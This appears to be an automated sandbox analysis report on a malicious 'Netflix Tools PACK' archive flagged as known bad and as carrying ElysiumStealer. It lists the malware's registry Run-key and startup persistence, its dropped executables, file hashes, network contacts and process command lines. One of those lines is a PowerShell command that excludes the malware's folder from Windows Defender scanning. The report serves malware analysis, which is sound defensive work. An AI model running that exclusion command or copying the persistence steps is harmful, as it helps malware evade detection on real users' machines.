Analysis Overview
SHA256
1070b4766e0979a8e15ddbd3d0ba27a9d05272027b3a20eaaf9c9fd854f2def7
Threat Level: Known bad
The file Netflix Tools PACK.rar was found to be: Known bad.
Malicious Activity Summary
ElysiumStealer
ElysiumStealer Support DLL
Blocklisted process makes network request
Modifies Windows Firewall
Executes dropped EXE
Drops startup file
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-06-23 22:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
23s
Max time network
32s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp |
Files
memory/464-133-0x00000000006B0000-0x00000000006C4000-memory.dmp
memory/464-134-0x00000000055A0000-0x0000000005B44000-memory.dmp
memory/464-135-0x0000000004FF0000-0x0000000005082000-memory.dmp
memory/464-136-0x0000000004F60000-0x0000000004F6A000-memory.dmp
memory/464-137-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/464-138-0x00000000065C0000-0x000000000663E000-memory.dmp
memory/464-139-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/3160-140-0x0000000002F30000-0x0000000002F66000-memory.dmp
memory/3160-141-0x0000000005B30000-0x0000000006158000-memory.dmp
memory/3160-142-0x0000000005980000-0x00000000059A2000-memory.dmp
memory/3160-143-0x0000000005A20000-0x0000000005A86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2cfj2kh.fup.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3160-149-0x0000000006210000-0x0000000006276000-memory.dmp
memory/3160-150-0x00000000054F0000-0x0000000005500000-memory.dmp
memory/3160-151-0x00000000054F0000-0x0000000005500000-memory.dmp
memory/3160-156-0x0000000006840000-0x000000000685E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/464-178-0x0000000006220000-0x0000000006296000-memory.dmp
memory/464-179-0x0000000006200000-0x000000000621E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2152-194-0x00000000009E0000-0x00000000009F2000-memory.dmp
memory/2152-195-0x0000000005380000-0x0000000005390000-memory.dmp
memory/3160-196-0x00000000054F0000-0x0000000005500000-memory.dmp
memory/3160-197-0x0000000006E00000-0x0000000006E32000-memory.dmp
memory/3160-198-0x000000006F800000-0x000000006F84C000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3160-209-0x0000000006DE0000-0x0000000006DFE000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/3920-213-0x0000000000DD0000-0x0000000000DE2000-memory.dmp
memory/3160-216-0x0000000008180000-0x00000000087FA000-memory.dmp
memory/3160-217-0x0000000007B40000-0x0000000007B5A000-memory.dmp
memory/3920-219-0x00000000016A0000-0x00000000016B0000-memory.dmp
memory/3160-218-0x000000007F490000-0x000000007F4A0000-memory.dmp
memory/3160-220-0x0000000007BB0000-0x0000000007BBA000-memory.dmp
memory/3160-221-0x0000000007DC0000-0x0000000007E56000-memory.dmp
memory/3160-222-0x0000000007D70000-0x0000000007D7E000-memory.dmp
memory/3160-223-0x0000000007E80000-0x0000000007E9A000-memory.dmp
memory/3160-224-0x0000000007E60000-0x0000000007E68000-memory.dmp
memory/2152-227-0x0000000005380000-0x0000000005390000-memory.dmp
memory/3920-228-0x00000000016A0000-0x00000000016B0000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
53s
Max time network
59s
Command Line
Signatures
ElysiumStealer
ElysiumStealer Support DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 1708 -ip 1708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1096
Network
| Country | Destination | Domain | Proto |
| NL | 87.248.202.1:80 | tcp | |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 20.42.65.90:443 | tcp | |
| US | 192.229.221.95:80 | tcp | |
| US | 8.8.8.8:53 | 86.8.109.52.in-addr.arpa | udp |
Files
memory/1708-133-0x0000000000D40000-0x0000000000F44000-memory.dmp
memory/1708-134-0x00000000059A0000-0x00000000059B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll
| MD5 | 94173de2e35aa8d621fc1c4f54b2a082 |
| SHA1 | fbb2266ee47f88462560f0370edb329554cd5869 |
| SHA256 | 7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f |
| SHA512 | cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798 |
memory/1708-139-0x00000000059B0000-0x0000000005A4C000-memory.dmp
memory/1708-140-0x0000000006000000-0x00000000065A4000-memory.dmp
memory/1708-141-0x0000000005AF0000-0x0000000005B82000-memory.dmp
memory/1708-142-0x0000000005A60000-0x0000000005A6A000-memory.dmp
memory/1708-143-0x0000000005C80000-0x0000000005CD6000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
37s
Command Line
Signatures
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\bc857adf-f38a-4911-a977-b0b36b5f4336.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230623225830.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\GC.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cracked.to/SpaceXVIII
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdad7846f8,0x7ffdad784708,0x7ffdad784718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7ae5e5460,0x7ff7ae5e5470,0x7ff7ae5e5480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
